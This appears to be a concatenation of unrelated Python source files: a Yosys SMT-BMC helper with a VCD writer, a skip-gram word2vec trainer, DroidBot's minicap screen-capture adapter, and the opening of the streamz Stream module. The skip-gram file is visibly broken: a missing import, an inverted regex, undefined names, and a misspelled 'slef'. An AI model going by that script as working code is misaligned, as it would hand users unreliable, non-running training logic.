while stmt[cursor] not in ["(", ")", "|", " ", "\t", "\r", "\n"]:
expr += stmt[cursor]
cursor += 1
return expr, cursor
return worker(stmt)[0]
def unparse(self, stmt):
if isinstance(stmt, list):
return "(" + " ".join([self.unparse(s) for s in stmt]) + ")"
return stmt
def bv2hex(self, v):
h = ""
v = self.bv2bin(v)
while len(v) > 0:
d = 0
if len(v) > 0 and v[-1] == "1": d += 1
if len(v) > 1 and v[-2] == "1": d += 2
if len(v) > 2 and v[-3] == "1": d += 4
if len(v) > 3 and v[-4] == "1": d += 8
h = hex(d)[2:] + h
if len(v) < 4: break
v = v[:-4]
return h
def bv2bin(self, v):
if type(v) is list and len(v) == 3 and v[0] == "_" and v[1].startswith("bv"):
x, n = int(v[1][2:]), int(v[2])
return "".join("1" if (x & (1 << i)) else "0" for i in range(n-1, -1, -1))
if v == "true": return "1"
if v == "false": return "0"
if v.startswith("#b"):
return v[2:]
if v.startswith("#x"):
return "".join(hex_dict.get(x) for x in v[2:])
assert False
def bv2int(self, v):
return int(self.bv2bin(v), 2)
def get(self, expr):
self.write("(get-value (%s))" % (expr))
return self.parse(self.read())[0][1]
def get_list(self, expr_list):
if len(expr_list) == 0:
return []
self.write("(get-value (%s))" % " ".join(expr_list))
return [n[1] for n in self.parse(self.read())]
def get_path(self, mod, path):
assert mod in self.modinfo
path = path.replace("\\", "/").split(".")
for i in range(len(path)-1):
first = ".".join(path[0:i+1])
second = ".".join(path[i+1:])
if first in self.modinfo[mod].cells:
nextmod = self.modinfo[mod].cells[first]
return [first] + self.get_path(nextmod, second)
return [".".join(path)]
def net_expr(self, mod, base, path):
if len(path) == 0:
return base
if len(path) == 1:
assert mod in self.modinfo
if path[0] == "":
return base
if path[0] in self.modinfo[mod].cells:
return "(|%s_h %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].wsize:
return "(|%s_n %s| %s)" % (mod, path[0], base)
if path[0] in self.modinfo[mod].memories:
return "(|%s_m %s| %s)" % (mod, path[0], base)
assert 0
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.net_expr(nextmod, nextbase, path[1:])
def net_width(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
assert net_path[-1] in self.modinfo[mod].wsize
return self.modinfo[mod].wsize[net_path[-1]]
def net_clock(self, mod, net_path):
for i in range(len(net_path)-1):
assert mod in self.modinfo
assert net_path[i] in self.modinfo[mod].cells
mod = self.modinfo[mod].cells[net_path[i]]
assert mod in self.modinfo
if net_path[-1] not in self.modinfo[mod].clocks:
return None
return self.modinfo[mod].clocks[net_path[-1]]
def net_exists(self, mod, net_path):
for i in range(len(net_path)-1):
if mod not in self.modinfo: return False
if net_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[net_path[i]]
if mod not in self.modinfo: return False
if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$version Generated by Yosys-SMTBMC $end", file=self.f)
print("$timescale 1ns $end", file=self.f)
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
skip-gramHSNP.py | import numpy as np
import multiprocessing
from multiprocessing import Pool, Array, Process, Value, Manager
import random
import os
import unicodedata
import time
from io import open
num_threads = multiprocessing.cpu_count()
start = time.process_time()
starting_lr = 1e-3
sample = 1e-3
word_count_actual = 0
lr = 0.025
print(num_threads)
MAX_STRING = 100
MAX_SENTENCE_LENGTH = 1000
MAX_CODE_LENGTH = 40
# Turn a Unicode string to plain ASCII
def unicodeToAscii(s):
return ''.join(
c for c in unicodedata.normalize('NFD', s)
if unicodedata.category(c) != 'Mn'
)
# Lowercase, trim, and remove non-letter characters
def normalizeString(s):
s = unicodeToAscii(s.lower().strip())
s = re.sub(r"([.!?])", r" \1", s)
s = re.sub(r"[a-zA-Z.!?]+", r" ", s)
s = re.sub(r"\s+", r" ", s).strip()
return s
class Voc:
def __init__(self):
self.trimmed = False
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
# For Huffman encoding
self.index2code = {}
self.index2point = {}
self.index2codelen = {}
self.num_words = 0
self.toal_words = 0
def _init_dict(self, input_file, min_count):
"""
sentences = []
for line in self.input_file:
sentence = []
line = line.strip().split(' ')
for word in line:
word = normalizeString(word)
self.addWord(word)
sentence.append[word]
sentences.append(sentence)
"""
# Customize for text8 data
sentences = []
line = input_file.read()
line = line.strip().split(' ')
for word in line:
word = normalizeString(word)
self.addWord(word)
sentences.append(word)
self.trim(min_count)
for k, c in self.word2count.items():
self.total_words += c
return sentences
def addSentence(self, sentence):
for word in sentence.split(' '):
self.addWord(word)
def addWord(self, word):
if word not in self.word2index:
self.word2index[word] = self.num_words
self.word2count[word] = 1
self.index2word[self.num_words] = word
self.index2count[self.num_words] = 1
self.num_words += 1
else:
self.word2count[word] += 1
self.index2count[self.word2index[word]] += 1
# Remove words below a certain count threshold
def trim(self, min_count):
if self.trimmed:
return
self.trimmed = True
keep_words = []
for k, v in self.word2count.items():
if v >= min_count:
for _ in range(v):
keep_words.append(k)
print('keep_words {} / {} = {:.4f}'.format(
len(keep_words), len(self.word2index), len(keep_words) / len(self.word2index)
))
# Reinitialize dictionaries
self.word2index = {}
self.word2count = {}
self.index2word = {}
self.index2count = {}
self.num_words = 0
for word in keep_words:
self.addWord(word)
class HuffmanTree:
def __init__(self, vocab):
self.vocab = vocab
self.vocab_size = len(self.vocab.index2count)
self.count = np.ones(self.vocab_size * 2 + 1) * 1e15
for word_id, frequency in self.vocab.index2count.items():
self.count[word_id] = frequency
self.binary = np.zeros(self.vocab_size * 2 + 1)
self.parent = np.zeros(self.vocab_size * 2 + 1)
def build_tree(self):
min1_idx = min2_idx = int()
pos1 = self.vocab_size - 1
pos2 = self.vocab_size
# Follwoing algorithm constructs the Huffman tree by adding one node at a time
for i in range(self.vocab_size):
# First, find two smallest nodes 'min1, min2'
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min1_idx = pos1
pos1 -= 1
else:
min1_idx = pos2
pos2 += 1
else:
min1_idx = pos2
pos2 += 1
if pos1 >= 0:
if self.count[pos1] < self.count[pos2]:
min2_idx = pos1
pos1 -= 1
else:
min2_idx = pos2
pos2 += 1
else:
min2_idx = pos2
pos2 += 1
self.count[self.vocab_size + i] = self.count[min1_idx] + self.count[min2_idx]
self.parent[min1_idx] = self.vocab_size + i
self.parent[min2_idx] = self.vocab_size + i
self.binary[min2_idx] = 1
# Now assign binary code to each vocabulary word
for w_id in range(self.vocab_size):
path_id = w_id
code = np.array(list())
point = np.array(list())
while 1:
np.insert(code, 0, binary[path_id])
np.insert(point, 0, path_id)
path_id = self.parent[path_id]
if path_id == (self.vocab_size * 2 - 2):
break
point = point - self.vocab_size
np.insert(point, 0, self.vocab_size - 2)
self.vocab.index2codelen[w_id] = len(code)
self.vocab.index2point[w_id] = point
self.vocab.index2code[w_id] = code
del code
del point
del self.count
del self.binary
del self.parent
MIN_COUNT = 3
MAX_EXP = 6
EPOCH = 5
WINDOW = 5
debug_mode = True
def sigmoid(x, derivative=False):
sigm = 1. / (1. + np.exp(-x))
if derivative:
return sigm * (1. - sigm)
return sigm
# Make a Skip-gram model
class SkipGram:
def __init__(self, vocab, emb_dim):
self.sentences = []
self.vocab = vocab
self.embed_dim = emb_dim
low = -0.5 / emb_dim
high = 0.5 / emb_dim
self.W = np.random.uniform(low, high, (self.vocab.num_words, emb_dim))
self.W_prime = np.zeros((self.vocab.num_words, emb_dim))
def LoadData(self, tid):
sentence_count = len(self.sentences)
start = sentence_count // num_threads * tid
end = min(sentence_count // num_threads * (tid + 1), sentence_count)
return self.sentences[start:end]
def Save_Embedding(self, file_name):
embedding = self.W
fout = open(file_name, 'w')
fout.write('%d %d\n' %(len(self.vocab.index2word), self.embed_dim))
for w_id, w in self.vocab.index2word.items():
e = embedding[w_id]
e = ' '.join(map(lambda x: str(x), e))
fout.write('%s %s\n' % (w, e))
def TrainModelThread(self, tid, lr, word_count_actual, W, W_prime):
word_count = last_word_count = sentence_position = sentence_length = 0
local_epochs = EPOCH
sentences = self.LoadData(tid.value)
neu1 = np.zeros(self.embed_dim)
neu1e = np.zeros(self.embed_dim)
sen = []
for epoch in local_epochs:
for sentence in sentences:
sentence_position = 0
sentence_length = 0
sen = []
while 1:
if word_count - last_word_count > 10000:
word_count_actual.value = word_count_actual.value + word_count - last_word_count
last_word_count = word_count
if debug_mode:
now = time.process_time()
print("Learning rate: {:f} Progress: {:.2f} Words/thread/sec: {:.2f}k ".format(lr,
word_count_actual.value / (EPOCH * self.vocab.total_words + 1) * 100,
word_count_actual.value / (now - start + 1) / 1e6 * 1000))
lr.value = starting_lr * (1 - word_count_actual.value / (EPOCH * self.vocab.total_words + 1))
if (lr.value < starting_lr * 0.0001):
lr.value = starting_lr * 0.0001
if sentence_length == 0:
for word in sentence:
word_count += 1
if sample > 0:
ran = (np.sqrt(self.vocab.word2count[word] / (sample * self.vocab.total_words)) + 1) * (sample * self.vocab.total_words) / self.vocab.word2count[word]
if ran < np.random.uniform(0, 1, 1).item():
continue
sen.append(self.vocab.word2index(word))
sentence_length += 1
sentence_position = 0
word_idx = sen[sentence_position]
neu1 = np.zeros(self.embed_dim)
neu1e = np.zeros(self.embed_dim)
b = np.random.randint(WINDOW, size=1).item()
for a in range(b, WINDOW*2 + 1 - b, 1):
if a != WINDOW:
last_pos = sentence_position - WINDOW + a
if last_pos < 0: continue
if last_pos >= sentence_length: continue
last_word_idx = sen[last_pos]
l1 = last_word_idx
neu1e = np.zeros(self.embed_dim)
# Hierarchical Softmax
for d in range(self.vocab.index2codelen[word_idx]):
f = 0
l2 = self.vocab.index2point[word_idx]
# Propagate hidden -> output
f += np.dot(W[l1], W_prime[l2])
if f <= -MAX_EXP:
continue
elif f >= MAX_EXP:
continue
else:
f = sigmoid(f)
# 'g' is the gradient multiplied by the learning rate
gradient = (1 - self.vocab.index2code[word_idx][d] - f) * lr.value
# Propagate errors output -> hidden
neu1e += gradient * W_prime[l2]
# Learn weights hidden -> output
W_prime[l2] += gradient * W[l1]
# Learn weights input -> hidden
W[l1] += neu1e
sentence_position += 1
if sentence_position >= sentence_length:
break
word_count_actual.value = word_count_actual.value + word_count - last_word_count
word_count = 0
last_word_count = 0
sentence_length = 0
def TrainModel(self, input_file_name, output_file_name):
print("Starting training using file ", input_file_name)
input_file = open(input_file_name, 'rb')
# Initializing dictionary
self.sentences = self.vocab._init_dict(input_file, MIN_COUNT)
huffman = HuffmanTree(self.vocab)
huffman.build_tree()
start = time.process_time()
jobs = []
t_id = Value('i', 0)
word_count_actual = Value('i', 0)
lr = Value('d', 0.025)
W = Array('d', self.W)
W_prime = Array('f', self.W_prime)
for i in range(num_threads):
p = Process(target=self.TrainModelThread, args=[t_id, lr, word_count_actual, W, W_prime])
jobs.append(p)
t_id.value = t_id.value + 1
for j in jobs:
j.start()
for j in jobs:
j.join()
self.SaveEmbedding(output_file_name)
input_file_name='/home/changmin/research/MMI/data/text8'
output_file_name='embedding.txt'
ff = open(input_file_name, 'r')
voc = Voc()
voc._init_dict(ff, 3)
print(self.voc.num_words)
print(slef.voc.word2index)
#skip = SkipGram(voc, 100)
#skip.TrainModel(input_file_name, output_file_name)
|
minicap.py | import logging
import socket
import subprocess
import time
from datetime import datetime
from .adapter import Adapter
MINICAP_REMOTE_ADDR = "localabstract:minicap"
ROTATION_CHECK_INTERVAL_S = 1 # Check rotation once per second
class MinicapException(Exception):
"""
Exception in minicap connection
"""
pass
class Minicap(Adapter):
"""
a connection with target device through minicap.
"""
def __init__(self, device=None):
"""
initiate a minicap connection
:param device: instance of Device
:return:
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.host = "localhost"
if device is None:
from droidbot.device import Device
device = Device()
self.device = device
self.port = self.device.get_random_port()
self.remote_minicap_path = "/data/local/tmp/minicap-devel"
self.sock = None
self.connected = False
self.minicap_process = None
self.banner = None
self.width = -1
self.height = -1
self.orientation = -1
self.last_screen = None
self.last_screen_time = None
self.last_views = []
self.last_rotation_check_time = datetime.now()
def set_up(self):
device = self.device
try:
minicap_files = device.adb.shell("ls %s 2>/dev/null" % self.remote_minicap_path).split()
if "minicap.so" in minicap_files and ("minicap" in minicap_files or "minicap-nopie" in minicap_files):
self.logger.debug("minicap was already installed.")
return
except:
pass
if device is not None:
# install minicap
import pkg_resources
local_minicap_path = pkg_resources.resource_filename("droidbot", "resources/minicap")
try:
device.adb.shell("mkdir %s 2>/dev/null" % self.remote_minicap_path)
except Exception:
pass
abi = device.adb.get_property('ro.product.cpu.abi')
sdk = device.get_sdk_version()
if sdk >= 16:
minicap_bin = "minicap"
else:
minicap_bin = "minicap-nopie"
device.push_file(local_file="%s/libs/%s/%s" % (local_minicap_path, abi, minicap_bin),
remote_dir=self.remote_minicap_path)
device.push_file(local_file="%s/jni/libs/android-%s/%s/minicap.so" % (local_minicap_path, sdk, abi),
remote_dir=self.remote_minicap_path)
self.logger.debug("minicap installed.")
def tear_down(self):
try:
delete_minicap_cmd = "adb -s %s shell rm -r %s" % (self.device.serial, self.remote_minicap_path)
p = subprocess.Popen(delete_minicap_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception:
pass
def connect(self):
device = self.device
display = device.get_display_info(refresh=True)
if 'width' not in display or 'height' not in display or 'orientation' not in display:
self.logger.warning("Cannot get the size of current device.")
return
w = display['width']
h = display['height']
if w > h:
temp = w
w = h
h = temp
o = display['orientation'] * 90
self.width = w
self.height = h
self.orientation = o
size_opt = "%dx%d@%dx%d/%d" % (w, h, w, h, o)
grant_minicap_perm_cmd = "adb -s %s shell chmod -R a+x %s" % \
(device.serial, self.remote_minicap_path)
start_minicap_cmd = "adb -s %s shell LD_LIBRARY_PATH=%s %s/minicap -P %s" % \
(device.serial, self.remote_minicap_path, self.remote_minicap_path, size_opt)
self.logger.debug("starting minicap: " + start_minicap_cmd)
p = subprocess.Popen(grant_minicap_perm_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
self.minicap_process = subprocess.Popen(start_minicap_cmd.split(),
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
# Wait 2 seconds for starting minicap
time.sleep(2)
self.logger.debug("minicap started.")
try:
# forward host port to remote port
forward_cmd = "adb -s %s forward tcp:%d %s" % (device.serial, self.port, MINICAP_REMOTE_ADDR)
subprocess.check_call(forward_cmd.split())
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.connect((self.host, self.port))
import threading
listen_thread = threading.Thread(target=self.listen_messages)
listen_thread.start()
except socket.error as e:
self.connected = False
self.logger.warning(e)
raise MinicapException()
def listen_messages(self):
self.logger.debug("start listening minicap images ...")
CHUNK_SIZE = 4096
readBannerBytes = 0
bannerLength = 2
readFrameBytes = 0
frameBodyLength = 0
frameBody = bytearray()
banner = {
"version": 0,
"length": 0,
"pid": 0,
"realWidth": 0,
"realHeight": 0,
"virtualWidth": 0,
"virtualHeight": 0,
"orientation": 0,
"quirks": 0,
}
self.connected = True
while self.connected:
chunk = bytearray(self.sock.recv(CHUNK_SIZE))
if not chunk:
continue
chunk_len = len(chunk)
cursor = 0
while cursor < chunk_len and self.connected:
if readBannerBytes < bannerLength:
if readBannerBytes == 0:
banner['version'] = chunk[cursor]
elif readBannerBytes == 1:
banner['length'] = bannerLength = chunk[cursor]
elif 2 <= readBannerBytes <= 5:
banner['pid'] += (chunk[cursor] << ((readBannerBytes - 2) * 8))
elif 6 <= readBannerBytes <= 9:
banner['realWidth'] += (chunk[cursor] << ((readBannerBytes - 6) * 8))
elif 10 <= readBannerBytes <= 13:
banner['realHeight'] += (chunk[cursor] << ((readBannerBytes - 10) * 8))
elif 14 <= readBannerBytes <= 17:
banner['virtualWidth'] += (chunk[cursor] << ((readBannerBytes - 14) * 8))
elif 18 <= readBannerBytes <= 21:
banner['virtualHeight'] += (chunk[cursor] << ((readBannerBytes - 18) * 8))
elif readBannerBytes == 22:
banner['orientation'] += chunk[cursor] * 90
elif readBannerBytes == 23:
banner['quirks'] = chunk[cursor]
cursor += 1
readBannerBytes += 1
if readBannerBytes == bannerLength:
self.banner = banner
self.logger.debug("minicap initialized: %s" % banner)
elif readFrameBytes < 4:
frameBodyLength += (chunk[cursor] << (readFrameBytes * 8))
cursor += 1
readFrameBytes += 1
else:
if chunk_len - cursor >= frameBodyLength:
frameBody += chunk[cursor: cursor + frameBodyLength]
self.handle_image(frameBody)
cursor += frameBodyLength
frameBodyLength = readFrameBytes = 0
frameBody = bytearray()
else:
frameBody += chunk[cursor:]
frameBodyLength -= chunk_len - cursor
readFrameBytes += chunk_len - cursor
cursor = chunk_len
print("[CONNECTION] %s is disconnected" % self.__class__.__name__)
def handle_image(self, frameBody):
# Sanity check for JPG header, only here for debugging purposes.
if frameBody[0] != 0xFF or frameBody[1] != 0xD8:
self.logger.warning("Frame body does not start with JPG header")
self.last_screen = frameBody
self.last_screen_time = datetime.now()
self.last_views = None
self.logger.debug("Received an image at %s" % self.last_screen_time)
self.check_rotation()
def check_rotation(self):
current_time = datetime.now()
if (current_time - self.last_rotation_check_time).total_seconds() < ROTATION_CHECK_INTERVAL_S:
return
display = self.device.get_display_info(refresh=True)
if 'orientation' in display:
cur_orientation = display['orientation'] * 90
if cur_orientation != self.orientation:
self.device.handle_rotation()
self.last_rotation_check_time = current_time
def check_connectivity(self):
"""
check if droidbot app is connected
:return: True for connected
"""
if not self.connected:
return False
if self.last_screen_time is None:
return False
return True
def disconnect(self):
"""
disconnect telnet
"""
self.connected = False
if self.sock is not None:
try:
self.sock.close()
except Exception as e:
print(e)
if self.minicap_process is not None:
try:
self.minicap_process.terminate()
except Exception as e:
print(e)
try:
forward_remove_cmd = "adb -s %s forward --remove tcp:%d" % (self.device.serial, self.port)
p = subprocess.Popen(forward_remove_cmd.split(), stderr=subprocess.PIPE, stdout=subprocess.PIPE)
out, err = p.communicate()
except Exception as e:
print(e)
def get_views(self):
"""
get UI views using cv module
opencv-python need to be installed for this function
:return: a list of views
"""
if not self.last_screen:
self.logger.warning("last_screen is None")
return None
if self.last_views:
return self.last_views
import cv
img = cv.load_image_from_buf(self.last_screen)
view_bounds = cv.find_views(img)
root_view = {
"class": "CVViewRoot",
"bounds": [[0, 0], [self.width, self.height]],
"enabled": True,
"temp_id": 0
}
views = [root_view]
temp_id = 1
for x,y,w,h in view_bounds:
view = {
"class": "CVView",
"bounds": [[x,y], [x+w, y+h]],
"enabled": True,
"temp_id": temp_id,
"signature": cv.calculate_dhash(img[y:y+h, x:x+w]),
"parent": 0
}
views.append(view)
temp_id += 1
root_view["children"] = list(range(1, temp_id))
self.last_views = views
return views
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
minicap = Minicap()
try:
minicap.set_up()
minicap.connect()
except:
minicap.disconnect()
minicap.tear_down()
minicap.device.disconnect()
|
core.py | import asyncio
from collections import deque, defaultdict
from datetime import timedelta
import functools
import logging
import six
import sys
import threading
from time import time
from typing import Any, Callable, Hashable, Union
import weakref
import toolz
from tornado import gen
from tornado.locks import Condition
from tornado.ioloop import IOLoop
from tornado.queues import Queue
try:
from distributed.client import default_client as _dask_default_client
except ImportError: # pragma: no cover
_dask_default_client = None
from collections.abc import Iterable
from threading import get_ident as get_thread_identity
from .orderedweakset import OrderedWeakrefSet
no_default = '--no-default--'
_html_update_streams = set()
thread_state = threading.local()
logger = logging.getLogger(__name__)
_io_loops = []
def get_io_loop(asynchronous=None):
if asynchronous:
return IOLoop.current()
if _dask_default_client is not None:
try:
client = _dask_default_client()
except ValueError:
# No dask client found; continue
pass
else:
return client.loop
if not _io_loops:
loop = IOLoop()
thread = threading.Thread(target=loop.start)
thread.daemon = True
thread.start()
_io_loops.append(loop)
return _io_loops[-1]
def identity(x):
return x
class RefCounter:
""" A counter to track references to data
This class is used to track how many nodes in the DAG are referencing
a particular element in the pipeline. When the count reaches zero,
then parties interested in knowing if data is done being processed are
notified
Parameters
----------
initial: int, optional
The initial value of the reference counter
cb: callable
The function to use a callback when the reference count reaches zero
loop: tornado.ioloop.IOLoop
The loop on which to create a callback when the reference count
reaches zero
"""
def __init__(self, initial=0, cb=None, loop=None):
self.loop = loop if loop else get_io_loop()
self.count = initial
self.cb = cb
def retain(self, n=1):
"""Retain the reference
Parameters
----------
n: The number of times to retain the reference
"""
self.count += n
def release(self, n=1):
"""Release the reference
If the reference count is equal to or less than zero, the callback, if
provided will added to the provided loop or default loop
Parameters
----------
n: The number of references to release
"""
self.count -= n
if self.count <= 0 and self.cb:
self.loop.add_callback(self.cb)
def __str__(self):
return '<RefCounter count={}>'.format(self.count)
__repr__ = __str__
class APIRegisterMixin(object):
@classmethod
def register_api(cls, modifier=identity, attribute_name=None):
""" Add callable to Stream API
This allows you to register a new method onto this class. You can use
it as a decorator.::
>>> @Stream.register_api()
... class foo(Stream):
... ...
>>> Stream().foo(...) # this works now
It attaches the callable as a normal attribute to the class object. In
doing so it respects inheritance (all subclasses of Stream will also
get the foo attribute).
By default callables are assumed to be instance methods. If you like
you can include modifiers to apply before attaching to the class as in
the following case where we construct a ``staticmethod``.
>>> @Stream.register_api(staticmethod)
... class foo(Stream):
... ...
>>> Stream.foo(...) # Foo operates as a static method
You can also provide an optional ``attribute_name`` argument to control
the name of the attribute your callable will be attached as.
>>> @Stream.register_api(attribute_name="bar")
... class foo(Stream):
... ...
>> Stream().bar(...) # foo was actually attached as bar
"""
def _(func):
@functools.wraps(func)
def wrapped(*args, **kwargs):
return func(*args, **kwargs)
name = attribute_name if attribute_name else func.__name__
setattr(cls, name, modifier(wrapped))
return func
return _
@classmethod
def register_plugin_entry_point(cls, entry_point, modifier=identity):
if hasattr(cls, entry_point.name):
raise ValueError(
f"Can't add {entry_point.name} from {entry_point.module_name} "
f"to {cls.__name__}: duplicate method name."
)
def stub(*args, **kwargs):
""" Entrypoints-based streamz plugin. Will be loaded on first call. """
node = entry_point.load()
if not issubclass(node, Stream):
raise TypeError(
f"Error loading {entry_point.name} "
f"from module {entry_point.module_name}: "
f"{node.__class__.__name__} must be a subclass of Stream"
)
if getattr(cls, entry_point.name).__name__ == "stub":
cls.register_api(
modifier=modifier, attribute_name=entry_point.name
)(node)
return node(*args, **kwargs)
cls.register_api(modifier=modifier, attribute_name=entry_point.name)(stub)
class Stream(APIRegisterMixin):
""" A Stream is an infinite sequence of data.
Streams subscribe to each other passing and transforming data between them.
A Stream object listens for updates from upstream, reacts to these updates,
and then emits more data to flow downstream to all Stream objects that
subscribe to it. Downstream Stream objects may connect at any point of a
Stream graph to get a full view of the data coming off of that point to do
with as they will.
Parameters
----------
stream_name: str or None
This is the name of the stream.
asynchronous: boolean or None
Whether or not this stream will be used in asynchronous functions or
normal Python functions. Leave as None if you don't know.
True will cause operations like emit to return awaitable Futures
False will use an Event loop in another thread (starts it if necessary)
ensure_io_loop: boolean
Ensure that some IOLoop will be created. If asynchronous is None or
False then this will be in a separate thread, otherwise it will be
IOLoop.current
Examples
--------
>>> def inc(x):
... return x + 1
>>> source = Stream() # Create a stream object
>>> s = source.map(inc).map(str) # Subscribe to make new streams
>>> s.sink(print) # take an action whenever an element reaches the end
>>> L = list()
>>> s.sink(L.append) # or take multiple actions (streams can branch)
>>> for i in range(5):
... source.emit(i) # push data in at the source
'1'
'2'
'3'
'4'
'5'
>>> L # and the actions happen at the sinks
['1', '2', '3', '4', '5']
"""
_graphviz_shape = 'ellipse'
_graphviz_style = 'rounded,filled'
_graphviz_fillcolor = 'white'
_graphviz_orientation = 0
str_list = ['func', 'predicate', 'n', 'interval']
def __init__(self, upstream=None, upstreams=None, stream_name=None,
loop=None, asynchronous=None, ensure_io_loop=False):
self.name = stream_name
self.downstreams = OrderedWeakrefSet()
self.current_value = None
self.current_metadata = None
if upstreams is not None:
self.upstreams = list(upstreams)
elif upstream is not None:
self.upstreams = [upstream]
else:
self.upstreams = []
self._set_asynchronous(asynchronous)
self._set_loop(loop)
if ensure_io_loop and not self.loop:
self._set_asynchronous(False)
if self.loop is None and self.asynchronous is not None:
self._set_loop(get_io_loop(self.asynchronous))
for upstream in self.upstreams:
if upstream:
